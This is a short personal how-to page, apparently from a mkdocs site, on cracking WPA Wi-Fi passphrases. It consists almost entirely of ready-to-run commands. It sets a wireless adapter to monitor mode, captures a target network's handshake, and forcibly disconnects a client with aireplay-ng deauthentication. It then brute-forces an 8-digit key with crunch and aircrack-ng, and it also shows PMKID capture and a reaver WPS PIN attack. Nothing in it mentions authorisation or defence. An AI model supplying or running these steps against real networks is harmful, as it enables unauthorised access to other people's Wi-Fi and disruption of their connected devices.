mkdocs-benoit.jp.net/docs/Howtos/HowtoCrackWPA.md
2021-02-20 15:06:15 +09:00

67 lines
1.2 KiB
Markdown

## Monitor mode
For my RTL8188EUS:
```console
# ip link set wlanX down
# iw dev wlanX set type monitor
```
## Scan networks
All channels:
```console
# airodump-ng wlanX
```
Specific channel:
```console
# airodump-ng -c 6 wlanX
```
## Save a capture of chosen BSSID
```console
# airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX
```
You need to wait for a client to connect, or to deauth it and get the 4-way handshake.
```console
# aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX
```
`-a` is access point
`-c` is client
Then you should have an EAPOL/WPA handshake.
## Crack WPA passphrase
### For a 8 digits scheme
```console
$ crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap
```
## Wireshark
PSK Generator: <https://www.wireshark.org/tools/wpa-psk.html>
## PMKID method
```console
$ hcxdumptool -i wlanX -o PMKID --enable_status=1
```
TODO...
## WPS method
AP must have WPS enabled with a PIN. Not PBC, push button.
```console
# reaver -i wlanX -b 00:23:B1:82:84:xx
```
## Resources
<https://github.com/ZerBea/hcxdumptool>
<https://github.com/ZerBea/hcxtools>
<https://wpa-sec.stanev.org/>